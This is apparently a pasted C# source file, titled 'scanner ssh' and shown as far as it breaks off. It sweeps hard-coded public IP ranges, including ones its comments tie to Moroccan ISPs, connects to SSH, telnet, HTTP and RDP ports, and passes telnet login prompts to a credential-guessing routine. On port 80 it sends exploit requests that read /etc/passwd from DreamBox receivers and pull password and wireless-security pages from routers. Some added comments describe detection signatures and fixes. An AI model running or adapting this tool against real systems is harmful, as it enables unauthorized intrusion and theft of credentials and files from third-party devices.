
scanner ssh

a guest
Nov 3rd, 2016
  1. using System;
  2. using System.Collections; //ArrayList
  3. using System.Collections.Generic;
  4. using System.IO;
  5. using System.Linq;
  6. using System.Text;
  7. using System.Threading;
  8.  
  9. using System.Net.Sockets;
  10. using System.Net;
  11.  
  12. using Tamir.SharpSsh;
  13.  
  14. //TODO: http://nion.modprobe.de/blog/archives/704-Exploiting-the-UbiquisysSFR-femtocell-webserver-wsalshttpdmongooseyassl-embedded-webserver.html
  15. //JA
  16. namespace sshbruteforcer
  17. {
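  /// <summary>
  /// Extension helpers that apply a bit mask to an <see cref="IPAddress"/> and test whether
  /// an IPv4 address is loopback or inside one of the RFC 1918 private ranges.
  /// </summary>
  public static class IPAddressMask
  {
      private static readonly IPAddress empty = IPAddress.Parse("0.0.0.0");

      // RFC 1918 blocks as (network address, netmask) pairs: 10/8, 172.16/12, 192.168/16.
      private static readonly IPAddress net10 = IPAddress.Parse("10.0.0.0");
      private static readonly IPAddress mask10 = IPAddress.Parse("255.0.0.0");
      private static readonly IPAddress net172 = IPAddress.Parse("172.16.0.0");
      private static readonly IPAddress mask172 = IPAddress.Parse("255.240.0.0");
      private static readonly IPAddress net192 = IPAddress.Parse("192.168.0.0");
      private static readonly IPAddress mask192 = IPAddress.Parse("255.255.0.0");

      /// <summary>
      /// Extracts the raw bytes of an address and a mask and verifies that both belong to the
      /// same address family (same byte length).
      /// </summary>
      /// <exception cref="ArgumentNullException">Either argument is null.</exception>
      /// <exception cref="ArgumentException">The address and the mask differ in length.</exception>
      private static void CheckIPVersion(IPAddress ipAddress, IPAddress mask, out byte[] addressBytes, out byte[] maskBytes)
      {
          // ArgumentNullException derives from ArgumentException, so callers that caught the
          // original bare ArgumentException for a null mask still catch this.
          if (ipAddress == null)
          {
              throw new ArgumentNullException("ipAddress");
          }
          if (mask == null)
          {
              throw new ArgumentNullException("mask");
          }

          addressBytes = ipAddress.GetAddressBytes();
          maskBytes = mask.GetAddressBytes();

          if (addressBytes.Length != maskBytes.Length)
          {
              throw new ArgumentException("The address and mask don't use the same IP standard");
          }
      }

      /// <summary>
      /// Returns the byte-wise AND of <paramref name="ipAddress"/> and <paramref name="mask"/>.
      /// </summary>
      /// <param name="ipAddress">Address to mask.</param>
      /// <param name="mask">Mask of the same address family.</param>
      /// <returns>A new address whose bytes are <c>address[i] &amp; mask[i]</c>.</returns>
      /// <exception cref="ArgumentException">An argument is null or the families differ.</exception>
      public static IPAddress And(this IPAddress ipAddress, IPAddress mask)
      {
          byte[] addressBytes;
          byte[] maskBytes;
          CheckIPVersion(ipAddress, mask, out addressBytes, out maskBytes);

          byte[] resultBytes = new byte[addressBytes.Length];
          for (int i = 0; i < addressBytes.Length; ++i)
          {
              resultBytes[i] = (byte)(addressBytes[i] & maskBytes[i]);
          }

          return new IPAddress(resultBytes);
      }

      // True when masking the address with the netmask yields exactly the network address.
      private static bool IsInNetwork(IPAddress ipAddress, IPAddress network, IPAddress netmask)
      {
          return network.Equals(ipAddress.And(netmask));
      }

      /// <summary>
      /// Returns true if the address is loopback or lies in one of the IANA-reserved private
      /// IPv4 ranges: 10.0.0.0-10.255.255.255, 172.16.0.0-172.31.255.255,
      /// 192.168.0.0-192.168.255.255. Returns false for 0.0.0.0.
      /// </summary>
      /// <remarks>
      /// The earlier version tested <c>ip == (ip AND broadcast)</c> for the 10/8 and 192.168/16
      /// ranges. That is a bit-subset test, not a prefix match, so public addresses such as
      /// 8.8.8.8 or 128.8.0.1 were reported as private. Each range is now matched as
      /// <c>(ip AND netmask) == network</c>.
      /// Only loopback and RFC 1918 are recognised. Link-local (169.254.0.0/16), carrier-grade
      /// NAT (100.64.0.0/10) and other special-purpose ranges are not, so this method on its own
      /// is not a complete internal-address check for an egress or SSRF filter.
      /// IPv6 input that <see cref="IPAddress.IsLoopback"/> does not report as loopback is not
      /// classified: it throws <see cref="ArgumentException"/> because the masks are IPv4.
      /// </remarks>
      /// <exception cref="ArgumentNullException"><paramref name="ipAddress"/> is null.</exception>
      /// <exception cref="ArgumentException">The address is a non-loopback IPv6 address.</exception>
      public static bool IsOnIntranet(this IPAddress ipAddress)
      {
          if (empty.Equals(ipAddress))
          {
              return false;
          }

          // IsLoopback throws ArgumentNullException for null, as the original code path did.
          if (IPAddress.IsLoopback(ipAddress))
          {
              return true;
          }

          return IsInNetwork(ipAddress, net10, mask10)
              || IsInNetwork(ipAddress, net172, mask172)
              || IsInNetwork(ipAddress, net192, mask192);
      }
  }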
  81.  
  82. public class Program //(string ipaddress)
  83. {
  84. // public Socket Sock_scan;
  85.  
  86.  
  // Static 32767-byte buffer. No active code in the visible part of the file reads or writes it.
  87. static Byte[] m_byBuff = new Byte[32767];
  88.  
  // Thread count at which the sweep loop in go() blocks in Monitor.Wait (compared with ==).
  89. int Max_thread=50;
  90.  
  // callbackProc and m_ListOptions are only mentioned in commented-out code in the visible part of the file.
  91. private static AsyncCallback callbackProc ;
  92. private static ArrayList m_ListOptions = new ArrayList();
  // Telnet command bytes (RFC 854): IAC=255, DO=253, DONT=254, WILL=251, WONT=252, SB=250, SE=240.
  // None of them is referenced by the visible code.
  93. static Char IAC = Convert.ToChar(255);
  94. static Char DO = Convert.ToChar(253);
  95. static Char DONT = Convert.ToChar(254);
  96. static Char WILL = Convert.ToChar(251);
  97. static Char WONT = Convert.ToChar(252);
  98. static Char SB = Convert.ToChar(250);
  99. static Char SE = Convert.ToChar(240);
  100.  
  101. // ManualResetEvent instances signal completion.
  // Only referenced from the commented-out asynchronous connect/receive paths in the visible code.
  102. private static ManualResetEvent connectDone =
  103. new ManualResetEvent(false);
  104. private static ManualResetEvent sendDone =
  105. new ManualResetEvent(false);
  106. private static ManualResetEvent receiveDone =
  107. new ManualResetEvent(false);
  108. // The response from the remote device.
  109. private static String response = String.Empty;
  110.  
  // Shared counter of running probe threads: go() calls Incrementer() after each thread start and
  // every Scanner_ip_port calls Decrementer() when its probe ends. Compteur_thread is declared
  // outside the visible part of the file.
  111. public static Compteur_thread cpt_th = new Compteur_thread();
  112.  
  113.  
  114.  
  115.  
  // Assigned by the constructor (Main passes "go" and 5); nothing in the visible code reads them.
  116. string ipaddress;
  117. int portx;
  118.  
  119. //public static IPAddress address = IPAddress.Parse("10.20.10.5");
  120. //bool onTheIntranet = address.IsOnIntranet();
  121.  
  122.  
  /// <summary>
  /// Stores the two constructor arguments in the instance fields of the same name.
  /// </summary>
  /// <param name="ipaddress">Value kept in the <c>ipaddress</c> field.</param>
  /// <param name="portx">Value kept in the <c>portx</c> field.</param>
  public Program(string ipaddress, int portx)
  {
      this.portx = portx;
      this.ipaddress = ipaddress;
  }
  129.  
  /// <summary>
  /// Entry point: creates a <c>Program</c> and runs its <c>go()</c> method on a new thread.
  /// </summary>
  /// <param name="args">Command-line arguments; not read.</param>
  public static void Main(string[] args)
  {
      // The constructor arguments are placeholders: go() works from its own hard-coded
      // address range and never reads them.
      Program sweeper = new Program("go", 5);
      new Thread(new ThreadStart(sweeper.go)).Start();
  }
  137.  
  /// <summary>
  /// Sweep driver. Walks every IPv4 address from the hard-coded start (s_ip) to the hard-coded
  /// end (s2_ip), octet by octet, and for each address starts one thread per probed port:
  /// Port_start..Port_end (22 and 23), then 80, 443, 1720 and 3389. Each thread runs
  /// Scanner_ip_port.Scanner_IP_Port.
  /// </summary>
  /// <remarks>
  /// Seen from the network this is a single source opening TCP connections to the same six
  /// ports on consecutive addresses, in ascending address order. That fixed port set and the
  /// sequential ordering are what flow-based or perimeter detection can key on.
  /// Nothing is returned; results are written to the console by the probe threads.
  /// </remarks>
  138. public void go()
  139. {
  140. // CScanner_IP s;
  141. // s = new CScanner_IP("41.250.149.1", "41.250.149.254", 21, 25);
  142.  
  143.  
  144. byte[] t_IP_start;
  145. byte[] t_IP_end;
  146.  
  147. // IPAddress MyExternalIp = GetExternalIp();
  148. // Console.WriteLine("MyExternalIp=" + MyExternalIp);
  149. // string[] s_ip = MyExternalIp.ToString().Split('.');
  150. // string[] s2_ip = MyExternalIp.ToString().Split('.');
  151.  
  152. string adresse_en_cours;
  153.  
  154.  
  // Inclusive port range of the per-address inner loop below.
  155. int Port_start=22;
  156. int Port_end=23;
  157.  
  158.  
  159.  
  160.  
  // Declared but never assigned in the active code of this method.
  161. Thread th_Lance_Scan;
  162. Thread th_Scan_ip_port;
  163.  
  164.  
  // Subscribes Lancer_Thread to the counter's lancer_thread event. Lancer_Thread is defined
  // outside the visible part of the file; presumably it wakes the Monitor.Wait below - confirm.
  165. cpt_th.lancer_thread += new Program.Compteur_thread.Lancer_Thread(Lancer_Thread);
  166.  
  167. //Split the start IP
  168. //196.28.249.--- Burkina Faso
  169. //41.202.193.--- Cameroon
  170. //195.24.206.--- Cameroon
  171. //90.4.125.--- France
  172. //202.152.43.--- Indonesia
  173. //202.159.126.--- Indonesia
  174.  
  175. //http://www.programva.com/en/list-of-ip-addresses-world-countries?user_0=%20Morocco%20MA%20MAR&user_a=ip%20addresses:%20&user_b=list%20of%20ip%20address&id_r=138&opEvent=country&opEventChild=
  176.  
  177. //41.214
  // Active start address; the commented-out alternatives below are earlier ranges left in place.
  178. string[] s_ip = { "41", "141", "1", "1" }; //zawi 41.250.195.107
  179. //string[] s_ip={"41", "250", "75", "1"}; //zawi 41.250.195.107
  180. //string[] s_ip = { "81", "192", "102", "1" }; //Maroc Telecom static IP 81.192.102.8: netpeas 81.192.152.205: cnia
  181. //41.248.0
  182. //41.248.158.92
  183. //string[] s_ip = { "41", "141", "235", "1" }; //example: 41.141.235.82
  184. //41.141.55.16 Agadir
  185. //41.143.11.192
  186. //41.250.59.57
  187. //41.250.118.53
  188. //41.250.129.142
  189. //string[] s_ip = { "41", "250", "82", "159" }; //example: 41.250.82.159
  190. // string[] s_ip = { "196", "12", "232", "1" }; //196.12.232.120 <snip> location
  191. //196.206.198.10 Rabat
  192. //string[] s_ip = { "41", "250", "136", "1" }; //<snip> location 41.250.136.238
  193. //string[] s_ip = { "41", "250", "150", "18" };
  194. //string[] s_ip = { "41", "250", "195", "1"}; //zawi 41.250.195.107
  195. //string[] s_ip = { "41", "251", "16", "1" }; //<snip> location 41.251.16.238
  196. //string[] s_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
  197. //http://www.robtex.com/dns/adsl.iam.net.ma.html#records
  198. //string[] s_ip = { "196", "217", "240", "1" }; //MENARA (mail)
  199. //string[] s_ip = { "81", "192", "48", "1" }; //MENARA (dns)
  200. //string[] s_ip = { "212", "217", "0", "1" }; //MENARA
  201.  
  // Start address as four bytes, one per octet string.
  202. t_IP_start = new byte[4];
  203. // for (int i = 0; i < s_ip.Length; i++)
  204. // t_IP_start[i] = Convert.ToByte(s_ip[i]);
  205. t_IP_start[0] = Convert.ToByte(s_ip[0]);
  206. t_IP_start[1] = Convert.ToByte(s_ip[1]);
  207. t_IP_start[2] = Convert.ToByte(s_ip[2]);
  208. t_IP_start[3] = Convert.ToByte(s_ip[3]);
  209. //t_IP_start[3] = Convert.ToByte("1");
  210.  
  211. //string[] s2_ip={"41", "250", "149", "254"}; //zawi
  212. // string[] s2_ip={"41", "251", "254", "254"}; //zawi
  // Active end address.
  213. string[] s2_ip = { "196", "12", "233", "255" }; //196.12.232.120 <snip> location
  214. //string[] s2_ip = { "41", "251", "16", "254" }; //<snip> location 41.251.35.72
  215. //string[] s2_ip = { "41", "141", "235", "254" }; //<snip> location 41.141.235.82
  216. //string[] s2_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
  217. // string[] s2_ip = { "41", "250", "150", "19" };
  218. //string[] s2_ip = { "196", "217", "255", "255" }; //MENARA (mail)
  219. //string[] s2_ip = { "81", "192", "63", "255" }; //MENARA (dns)
  220. //string[] s2_ip = { "212", "217", "31", "255" }; //MENARA
  221.  
  // End address as four bytes.
  222. t_IP_end = new byte[4];
  223. // for (int i = 0; i < s_ip.Length; i++)
  224. // t_IP_end[i] = Convert.ToByte(s2_ip[i]);
  225. t_IP_end[0] = Convert.ToByte(s2_ip[0]);
  226. t_IP_end[1] = Convert.ToByte(s2_ip[1]);
  227. t_IP_end[2] = Convert.ToByte(s2_ip[2]);
  228. t_IP_end[3] = Convert.ToByte(s2_ip[3]);
  229. //t_IP_end[3] = Convert.ToByte("255");
  230.  
  231. // private void Lancer_Scan()
  232. // {
  // i, j, k, l are the four octets of the current address. Each start_* flag is true only
  // during the first pass of its loop level, when that octet begins at the start address
  // instead of 0; max_* is the upper bound chosen for the current pass.
  233. int i=0, j=0, k=0, l=0;
  234. int max_j=0, max_k=0, max_l=0;
  235. bool start_j = true;
  236. bool start_k = true;
  237. bool start_l = true;
  238.  
  239. try
  240. {
  241.  
  242. // Info_Scan infs = new Info_Scan(IP_start, IP_end, Port, "Debut du scan", "");
  243. //Console.WriteLine("Debut du scan");
  244. // if(init_scan != null)init_scan(this, infs);
  245.  
  // First octet.
  246. for(i = t_IP_start[0];i <= t_IP_end[0]; i++)
  247. {
  248. if((start_j) && (t_IP_start[0] != t_IP_end[0]))
  249. {
  250. j = t_IP_start[1];
  251. max_j = 255;
  252. }
  253. if((start_j) && (t_IP_start[0] == t_IP_end[0]))
  254. {
  255. j = t_IP_start[1];
  256. max_j = t_IP_end[1];
  257. }
  258.  
  259. if((!start_j) && (i != t_IP_end[0]))
  260. {
  261. j = 0;
  262. max_j = 255;
  263. }
  264. if((!start_j) && (i == t_IP_end[0]))
  265. {
  266. j = 0;
  267. max_j = t_IP_end[1];
  268. }
  269.  
  // Second octet.
  270. for( ;j <= max_j; j++)
  271. {
  272.  
  273. if((start_k) && (t_IP_start[1] != t_IP_end[1]))
  274. {
  275. k = t_IP_start[2];
  276. max_k = 255;
  277. }
  278. if((start_k) && (t_IP_start[1] == t_IP_end[1]))
  279. {
  280. k = t_IP_start[2];
  281. max_k = t_IP_end[2];
  282. }
  283.  
  284. if((!start_k) && (j != t_IP_end[1]))
  285. {
  286. k = 0;
  287. max_k = 255;
  288. }
  289. if((!start_k) && (j == t_IP_end[1]))
  290. {
  291. k = 0;
  292. max_k = t_IP_end[2];
  293. }
  294.  
  // Third octet.
  295. for( ;k <= max_k; k++)
  296. {
  297.  
  298. if((start_l) && (t_IP_start[2] != t_IP_end[2]))
  299. {
  300. l = t_IP_start[3];
  301. max_l = 255;
  302. }
  303. if((start_l) && (t_IP_start[2] == t_IP_end[2]))
  304. {
  305. l = t_IP_start[3];
  306. max_l = t_IP_end[3];
  307. }
  308.  
  309. if((!start_l) && (k != t_IP_end[2]))
  310. {
  311. l = 0;
  312. max_l = 255;
  313. }
  314. if((!start_l) && (k == t_IP_end[2]))
  315. {
  316. l = 0;
  317. max_l = t_IP_end[3];
  318. }
  319.  
  // Fourth octet: one full set of probes per address.
  320. for( ;l <= max_l; l++)
  321. {
  322. adresse_en_cours = i.ToString() + "." + j.ToString() + "." + k.ToString() + "." + l.ToString();
  323.  
  324. // Info_Scan info = new Info_Scan(adresse_en_cours, Port, "starting to scan", "");
  325. // Console.WriteLine("DEBUG Current IP: {0}",adresse_en_cours);
  326.  
  327. // if(debut_scan != null)
  328. // debut_scan(this, info);
  329.  
  330. /*
  331. Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, Port, this, cpt_th);
  332. */
  333. int nb_thread = 0;
  // One Scanner_ip_port and one thread per (address, port). After each launch the
  // running-thread count is read back; when it equals Max_thread this thread blocks in
  // Monitor.Wait(this) until another thread pulses this Program instance. The Pulse call
  // is not in the visible part of the file.
  334. for (int port = Port_start; port <= Port_end; port++)
  335. {
  336. /*
  337. Scanner_IP_Port(adresse_en_cours, port);
  338. th_Scan_ip_port = new Thread(new ThreadStart(Scanner_IP_Port));
  339. th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
  340. th_Scan_ip_port.Start();
  341. */
  342.  
  343. Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, port, cpt_th);
  344.  
  345. Thread t = new Thread(new ThreadStart(sc.Scanner_IP_Port));
  346. t.Start();
  347.  
  348. cpt_th.Incrementer();
  349. nb_thread = 0;
  350. cpt_th.Nb_thread(out nb_thread);
  351. if (nb_thread == this.Max_thread)
  352. {
  353. lock (this)
  354. {
  355. // Console.WriteLine("DEBUG WAIT1");
  356. Monitor.Wait(this);
  357. }
  358. }
  359. }
  360.  
  361. //http scan
  // Same launch / count / wait sequence as above, for port 80. This is the only port for
  // which Scanner_IP_Port goes on to send HTTP requests.
  362.  
  363. Scanner_ip_port sc2 = new Scanner_ip_port(adresse_en_cours, 80, cpt_th);
  364.  
  365. Thread t2 = new Thread(new ThreadStart(sc2.Scanner_IP_Port));
  366. t2.Start();
  367.  
  368. cpt_th.Incrementer();
  369. nb_thread = 0;
  370. cpt_th.Nb_thread(out nb_thread);
  371. if (nb_thread == this.Max_thread)
  372. {
  373. lock (this)
  374. {
  375. // Console.WriteLine("DEBUG WAIT2");
  376. Monitor.Wait(this);
  377. }
  378. }
  379.  
  380.  
  381. //https scan
  // Port 443: Scanner_IP_Port has no 443-specific branch, so only the connect and the raw
  // banner read happen.
  382.  
  383. Scanner_ip_port sc3 = new Scanner_ip_port(adresse_en_cours, 443, cpt_th);
  384.  
  385. Thread t3 = new Thread(new ThreadStart(sc3.Scanner_IP_Port));
  386. t3.Start();
  387.  
  388. cpt_th.Incrementer();
  389. nb_thread = 0;
  390. cpt_th.Nb_thread(out nb_thread);
  391. if (nb_thread == this.Max_thread)
  392. {
  393. lock (this)
  394. {
  395. //Console.WriteLine("DEBUG WAIT2");
  396. Monitor.Wait(this);
  397. }
  398. }
  399.  
  400. //VIDEO H.323 scan : ref.: HD MOORE (Rapid7)
  // Port 1720: connect and banner read only.
  401. Scanner_ip_port sc1720 = new Scanner_ip_port(adresse_en_cours, 1720, cpt_th);
  402.  
  403. Thread t1720 = new Thread(new ThreadStart(sc1720.Scanner_IP_Port));
  404. t1720.Start();
  405.  
  406. cpt_th.Incrementer();
  407. nb_thread = 0;
  408. cpt_th.Nb_thread(out nb_thread);
  409. if (nb_thread == this.Max_thread)
  410. {
  411. lock (this)
  412. {
  413. //Console.WriteLine("DEBUG WAIT2");
  414. Monitor.Wait(this);
  415. }
  416. }
  417.  
  418.  
  419. //RDP scan
  // Port 3389: connect and banner read only.
  420. Scanner_ip_port sc3389 = new Scanner_ip_port(adresse_en_cours, 3389, cpt_th);
  421.  
  422. Thread t3389 = new Thread(new ThreadStart(sc3389.Scanner_IP_Port));
  423. t3389.Start();
  424.  
  425. cpt_th.Incrementer();
  426. nb_thread = 0;
  427. cpt_th.Nb_thread(out nb_thread);
  428. if (nb_thread == this.Max_thread)
  429. {
  430. lock (this)
  431. {
  432. //Console.WriteLine("DEBUG WAIT2");
  433. Monitor.Wait(this);
  434. }
  435. }
  436.  
  437. /*
  438. sc.scan_en_cours += new Scanner_IP.Scanner_ip_port.Scan_en_cours(Ev_scan_en_cours);
  439. th_Scan_ip_port = new Thread(new ThreadStart(sc.Scanner_IP_Port));
  440. th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
  441. th_Scan_ip_port.Start();
  442.  
  443. cpt_th.Incrementer();
  444. int nb_thread = 0;
  445. cpt_th.Nb_thread(out nb_thread);
  446. */
  447.  
  448. /*
  449. if((this.i_progress == this.pas_a_atteindre) && (this.i_progress <= this._ECART_IP_))
  450. {
  451. Info_Scan ifs = new Info_Scan(adresse_en_cours, Port, "", "", (int)(this.pct_progress * 100));
  452. if(this.maj_prg_bar != null)
  453. this.maj_prg_bar(this, ifs);
  454.  
  455. this.pas_a_atteindre += this.pas_progress;
  456. }
  457.  
  458. i_progress++;
  459. */
  460.  
  461. /*
  462. if(nb_thread == this.Max_thread)
  463. {
  464. lock(this)
  465. {
  466. Monitor.Wait(this);
  467. }
  468.  
  469. if(this.ARRETER_SCAN)
  470. {
  471. Info_Scan inf_s = new Info_Scan("", 0, "", "Arrêt du scan");
  472. if(fin_scan != null)fin_scan(this, inf_s);
  473.  
  474. return;
  475. }
  476. }
  477. */
  478. }
  479. start_l = false;
  480. }
  481. start_k = false;
  482. }
  483. start_j = false;
  484. }
  485.  
  486. // Info_Scan inf = new Info_Scan("", 0, "", "Fin du scan");
  487. // if(fin_scan != null)fin_scan(this, inf);
  488. }
  // Any exception raised inside the loops ends the sweep; it is printed with the "BADBOY: " prefix.
  489. catch(Exception e)
  490. {
  491. Console.WriteLine("BADBOY: "+e.ToString());
  492. }
  493. // }
  494.  
  495.  
  496.  
  497.  
  498.  
  499. }
  500.  
  /// <summary>
  /// One probe of a single (address, port) pair, meant to run on its own thread.
  /// Holds the target address, the port and the shared running-thread counter.
  /// </summary>
  501. public class Scanner_ip_port
  502. {
  503. string adresse_ip;
  504. int port;
  505.  
  506. Compteur_thread cpt_th;
  507.  
  508.  
  509.  
  510.  
  /// <summary>Stores the target address, the port and the shared thread counter.</summary>
  511. public Scanner_ip_port(string adresse_ip, int port, Compteur_thread cpt_th)
  512. {
  513. this.adresse_ip = adresse_ip;
  514. this.port = port;
  515. this.cpt_th = cpt_th;
  516. }
  517.  
  /// <summary>
  /// Opens a blocking TCP connection to the stored address and port, prints that the port is
  /// open, reads up to 4096 bytes and prints them as the banner (ASCII). Then, depending on
  /// the port: 21 and 22 close the socket (the ftptry/sshtry calls are commented out);
  /// 23 reads further data until a login or password prompt is seen, closes the socket and
  /// calls telnettry unless the banner carries the ACL-denied message; 80 sends a fixed series
  /// of HTTP requests and prints status, headers and full body of each response.
  /// </summary>
  /// <remarks>
  /// HTTP requests issued for port 80, in this order, with only Method (and ContentLength for
  /// the POST) set, so no credentials or cookies are sent by the visible code:
  /// GET /password.cgi, GET /file?file=/etc/passwd, GET /wlcfg.html, GET /wlsecurity.html,
  /// POST /scdmz.html?address=192.168.1.2 with body "address=192.168.1.2".
  /// These literal paths arriving from one client in quick succession are a usable web-log
  /// signature. A device is only affected if it serves these pages to unauthenticated
  /// WAN-side clients, which is the condition to remove (no management UI on the WAN
  /// interface, authentication on every page, current firmware).
  /// NOTE(review): the last request is a POST to the page the author labels DMZ, so unlike
  /// the GETs it may change device configuration - confirm against the device documentation.
  /// Every exception (refused connection, timeout, HTTP error, parse error) lands in the same
  /// catch, which only decrements the thread counter; nothing is logged.
  /// </remarks>
  518. public void Scanner_IP_Port()
  519. {
  520. try
  521. {
  522. // Console.WriteLine("DEBUG SCANNING: " + adresse_ip.ToString());
  523.  
  524. IPAddress adresseIP = IPAddress.Parse(adresse_ip);
  525. IPEndPoint ip = new IPEndPoint(adresseIP, port);
  526. Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
  527. //Sock_scan.Blocking = false;
  528. // Connect to the remote endpoint.
  // Full TCP handshake (not a half-open probe); a failed connect throws and is handled
  // by the catch at the end of the method.
  529. Sock_scan.Connect(ip);
  530. /*asynchronous
  531. try
  532. {
  533. Sock_scan.BeginConnect(ip, new AsyncCallback(ConnectCallback), Sock_scan);
  534. }
  535. catch (Exception e)
  536. {
  537. Console.WriteLine("DEBUG BEGINCONNECT: "+e);
  538. }
  539. Console.WriteLine("DEBUG RACHEL");
  540. connectDone.WaitOne(1000);
  541. asynchronous*/
  542.  
  543. // Info_Scan info = new Info_Scan(adresse_ip, port, "Port ouvert", "", ind, Resultat_Scan.reussite);
  544. Console.WriteLine("{0} -> Port {1} open", adresse_ip, port);
  545. // if (scan_en_cours != null) scan_en_cours(this, info);
  546.  
  547.  
  548. /*
  549. Byte[] RecvBytes = new Byte[256];
  550. String strRetPage = null;
  551. Int32 bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
  552. Encoding ASCII = Encoding.ASCII;
  553. strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
  554.  
  555. while (bytes > 0)
  556. {
  557. bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
  558. strRetPage = ASCII.GetString(RecvBytes, 0, bytes);
  559. }
  560. Console.WriteLine(strRetPage);
  561. */
  562. byte[] data = new byte[4096];
  563. string banner;
  564. int recv;
  565. /*
  566. NetworkStream ns = new NetworkStream(Sock_scan);
  567. if (ns.CanRead)
  568. {
  569. recv = ns.Read(data, 0, data.Length);
  570. stringData = Encoding.ASCII.GetString(data, 0, recv);
  571. Console.WriteLine("== BANNER START =======================");
  572. Console.WriteLine(stringData);
  573. Console.WriteLine("== BANNER END =======================");
  574. }
  575. else
  576. {
  577. Console.WriteLine("Error: Can't read from this socket");
  578. ns.Close();
  579. // server.Close();
  580. // return;
  581. }
  582. */
  583.  
  584. // Receive the response from the remote device.
  585. /*synchro*/
  // Blocking read of whatever the service sends first. The banner text is placed inside the
  // format string itself, so remote bytes are interpreted by Console.WriteLine as a
  // composite format string.
  586. recv = Sock_scan.Receive(data);
  587. banner = Encoding.ASCII.GetString(data, 0, recv);
  588. Console.WriteLine("{0}:{1} -> BANNER01: " + banner, adresse_ip, port);
  589.  
  // One more read when the first one decoded to an empty string.
  590. if (banner == "")
  591. {
  592. recv = Sock_scan.Receive(data);
  593. banner = Encoding.ASCII.GetString(data, 0, recv);
  594. Console.WriteLine("{0}:{1} -> BANNER02: " + banner, adresse_ip, port);
  595. }
  596.  
  597. /*synchro*/
  598.  
  599. /*asynchro
  600. Receive(Sock_scan);
  601. receiveDone.WaitOne(1000);
  602. // Write the response to the console.
  603. Console.WriteLine("Response received : {0}", response);
  604. banner = response;
  605. asynchro*/
  606.  
  607.  
  608.  
  609.  
  610.  
  611.  
  612.  
  // Ports 21 and 22: close only; the credential-guessing calls are commented out.
  613. if (port == 21)
  614. {
  615. Sock_scan.Close();
  616. // ftptry(adresse_ip);
  617. }
  618. if (port == 22)
  619. {
  620. Sock_scan.Close();
  621. // sshtry(adresse_ip);
  622. }
  // Port 23: keep reading (at most two more times) until the text contains "ogin:" or
  // "assword:", then hand the last text read to telnettry unless it is the ACL-denied message.
  623. if (port == 23)
  624. {
  625. if (banner.Contains("ogin:") || banner.Contains("assword:") || banner.Contains("Connection was denied by remote host according to ACL!"))
  626. {
  627.  
  628. }
  629. else
  630. {
  631. recv = Sock_scan.Receive(data);
  632. banner = Encoding.ASCII.GetString(data, 0, recv);
  633. Console.WriteLine("{0}:{1} -> BANNER03: " + banner, adresse_ip, port);
  634. if (banner.Contains("ogin:") || banner.Contains("assword:"))
  635. {
  636.  
  637. }
  638. else
  639. {
  640. recv = Sock_scan.Receive(data);
  641. banner = Encoding.ASCII.GetString(data, 0, recv);
  642. Console.WriteLine("{0}:{1} -> BANNER04: " + banner, adresse_ip, port);
  643. }
  644. }
  645. Sock_scan.Close();
  646. if (banner.Contains("Connection was denied by remote host according to ACL!"))
  647. {
  648.  
  649. }
  650. else
  651. {
  652. telnettry(adresse_ip, banner);
  653. }
  654. }
  // Port 80: fixed sequence of requests against embedded-device web interfaces. Each response
  // is read to the end and printed in full (status, headers, body).
  655. if (port == 80)
  656. {
  657. string ResponseText = "";
  658. StreamReader SR = null;
  659. HttpWebResponse response = null;
  660. HttpWebRequest request;
  661. request = (HttpWebRequest)HttpWebRequest.Create("http://"+adresse_ip+"/password.cgi");
  662. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
  663.  
  664. request.Method = "GET";
  665. //request.ContentType = "application/xml";
  666.  
  // GetResponse throws WebException on an HTTP error status, which skips all later requests.
  667. response = (HttpWebResponse)request.GetResponse();
  668. SR = new StreamReader(response.GetResponseStream());
  669. ResponseText = SR.ReadToEnd();
  670.  
  671. Console.WriteLine(string.Format("password.cgi response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
  672. Console.WriteLine(string.Format("password.cgi response headers : [{0}]", response.Headers.ToString()));
  673. Console.WriteLine(string.Format("password.cgi response received : [{0}]", ResponseText));
  674.  
  675. //***********************************************************************************************************************************************
  676. //DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
  677. //http://www.exploit-db.com/exploits/18079/
  // The console label below says "RFI"; the advisory title cited above is a file disclosure.
  678. request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/file?file=/etc/passwd");
  679. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
  680.  
  681. request.Method = "GET";
  682. //request.ContentType = "application/xml";
  683.  
  684. response = (HttpWebResponse)request.GetResponse();
  685. SR = new StreamReader(response.GetResponseStream());
  686. ResponseText = SR.ReadToEnd();
  687.  
  688. Console.WriteLine(string.Format("DreamBox RFI response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
  689. Console.WriteLine(string.Format("DreamBox RFI response headers : [{0}]", response.Headers.ToString()));
  690. Console.WriteLine(string.Format("DreamBox RFI response received : [{0}]", ResponseText));
  691.  
  692.  
  693. //***********************************************************************************************************************************************
  694. //108M Wireless ADSL2+ Router
  695. //http://41.250.9.119/wlcfg.html //Wireless/Basic
  696. //http://41.250.9.119/wlsecurity.html //Wireless/Security
  697.  
  698. request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlcfg.html");
  699. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
  700.  
  701. request.Method = "GET";
  702. //request.ContentType = "application/xml";
  703.  
  704. response = (HttpWebResponse)request.GetResponse();
  705. SR = new StreamReader(response.GetResponseStream());
  706. ResponseText = SR.ReadToEnd();
  707.  
  708. Console.WriteLine(string.Format("wlcfg.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
  709. Console.WriteLine(string.Format("wlcfg.html response headers : [{0}]", response.Headers.ToString()));
  710. Console.WriteLine(string.Format("wlcfg.html response received : [{0}]", ResponseText));
  711. //***********************************************************************************************************************************************
